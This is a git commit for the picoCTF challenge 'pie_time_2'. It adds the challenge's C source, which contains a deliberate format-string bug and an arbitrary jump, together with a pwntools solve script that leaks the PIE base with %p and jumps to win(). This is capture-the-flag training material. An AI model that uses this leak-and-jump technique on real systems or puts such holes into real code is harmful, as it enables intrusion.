pwn/pie_time_2

This commit is contained in:
2026-07-02 08:14:25 +09:00
parent 91c0fd7d66
commit dd03456686
4 changed files with 101 additions and 0 deletions
+1
View File
@@ -0,0 +1 @@
picoCTF{dummy}
+44
View File
@@ -0,0 +1,44 @@
#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
from pwn import *
exe = ELF("./vuln")
context.binary = exe
ADDR, PORT, *_ = "rescued-float.picoctf.net 54718".split()
def conn() -> remote:
if args.REMOTE:
r = remote(ADDR, PORT)
else:
r = process([exe.path])
return r
def main():
r = conn()
# gdb.attach(r, gdbscript='''
# info proc mappings
# c
# ''')
# Calculated by inspecting the output - the reported binary start address from gdb
leak_offset = 0x1441
r.recvuntil(b'Enter your name:').decode()
r.sendline(b'%p\t'*20)
leaks = r.recvline().strip().decode().split('\t')
base_leak = leaks[18]
exe.address = int(base_leak[2:], 16) - leak_offset
print(f"Base address: {hex(exe.address)}, jump to win: {hex(exe.symbols['win'])}")
print(r.recvuntil(b' enter the address to jump to, ex => 0x12345: ').decode())
r.sendline(hex(exe.symbols['win']))
print(r.recvall().decode())
r.close()
if __name__ == "__main__":
main()
BIN
View File
Binary file not shown.
+56
View File
@@ -0,0 +1,56 @@
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void segfault_handler() {
printf("Segfault Occurred, incorrect address.\n");
exit(0);
}
void call_functions() {
char buffer[64];
printf("Enter your name:");
fgets(buffer, 64, stdin);
printf(buffer);
unsigned long val;
printf(" enter the address to jump to, ex => 0x12345: ");
scanf("%lx", &val);
void (*foo)(void) = (void (*)())val;
foo();
}
int win() {
FILE *fptr;
char c;
printf("You won!\n");
// Open file
fptr = fopen("flag.txt", "r");
if (fptr == NULL)
{
printf("Cannot open file.\n");
exit(0);
}
// Read contents from file
c = fgetc(fptr);
while (c != EOF)
{
printf ("%c", c);
c = fgetc(fptr);
}
printf("\n");
fclose(fptr);
}
int main() {
signal(SIGSEGV, segfault_handler);
setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
call_functions();
return 0;
}